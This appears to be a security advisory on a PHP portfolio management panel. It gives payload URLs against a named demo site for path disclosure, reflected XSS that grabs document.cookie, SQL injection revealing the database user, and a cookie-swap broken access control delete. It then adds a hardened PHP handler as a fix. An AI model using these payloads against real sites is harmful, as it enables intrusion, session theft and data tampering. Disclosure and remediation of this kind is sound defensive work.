### Techno Portfolio Management Panel - SQL Injection/XSS/Information leak/Broken Access Control

ADLab of Venustech

While pentesting the official demo site of Techno Portfolio Management Panel, I found that, once logged into the backend, several vulnerabilities were left there.

Information leak:

URL: http://dacy.esy.es/eng/panel/search.php?s=1'

For example, we can get some sensitive data here, such as the absolute path:

/home/u633631124/public_html/eng/panel/search.php


XSS:

URL: http://dacy.esy.es/eng/panel/search.php?s=123%27%22%3E%3Csvg/onload=alert(document.cookie)%3E%3C%27%22

For example, we can get the site cookie here or do something more evil.


SQL Injection:


URL: http://dacy.esy.es/eng/panel/search.php?s=1

For example, we can get the database user or other info here, using some tools or just by hand:

current user: 'u633631124_dacy@10.2.1.20'

Broken Access Control:

While the feedback option should only be viewed or operated by the admin user itself, I replaced the admin's cookie with the cookie of the demo normal user, and I successfully removed a feedback entry with the authority of a normal user.

Feedback Remove URL: http://dacy.esy.es/eng/panel/portfolio.php?action=delete&id=x


In a word, this is a broken access control vulnerability.
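As an added example, not code from Techno Portfolio Management Panel (whose source is not shown here), this hypothetical hardened handler shows how the four findings above would be closed at the code level: error output suppressed so no absolute path leaks, the `s` parameter bound in a prepared statement, the reflected value HTML-encoded, and the delete action gated on the server-side session role rather than on whatever cookie the client presents. It assumes a PDO connection in `$pdo`, a `portfolio` table with `id`/`title` columns, a `feedback` table with an `id` column, and a session that stores `user_id` and `role` at login.

```php
<?php
// Hypothetical hardened search/delete handler (added example, not the panel's code).
// Assumes: $pdo (PDO), tables `portfolio`(id,title) and `feedback`(id),
// $_SESSION['user_id'] and $_SESSION['role'] set by the login flow.
ini_set('display_errors', '0');        // never print PHP errors (no path disclosure)
error_reporting(E_ALL);                // still log everything server-side
session_start();
header('Content-Type: text/html; charset=UTF-8');

if (!isset($_SESSION['user_id'])) {    // every panel page requires a valid login
    http_response_code(403);
    exit('Login required');
}

// Search: bind the user input as a parameter instead of concatenating it,
// so s=1' is just a literal string and cannot alter the query.
$term = $_GET['s'] ?? '';
$stmt = $pdo->prepare('SELECT id, title FROM portfolio WHERE title LIKE :t');
$stmt->execute([':t' => '%' . $term . '%']);

// Output: encode before reflecting, so "><svg/onload=...> stays inert text.
echo '<p>Results for ' . htmlspecialchars($term, ENT_QUOTES, 'UTF-8') . '</p><ul>';
foreach ($stmt as $row) {
    echo '<li>' . htmlspecialchars($row['title'], ENT_QUOTES, 'UTF-8') . '</li>';
}
echo '</ul>';

// Delete: authorise on the role stored server-side at login, not on a
// client-controlled cookie value, and require POST so a GET link cannot trigger it.
if (($_POST['action'] ?? '') === 'delete') {
    if (($_SESSION['role'] ?? '') !== 'admin') {
        http_response_code(403);
        exit('Forbidden');
    }
    $del = $pdo->prepare('DELETE FROM feedback WHERE id = :id');
    $del->execute([':id' => (int)($_POST['id'] ?? 0)]);
}
```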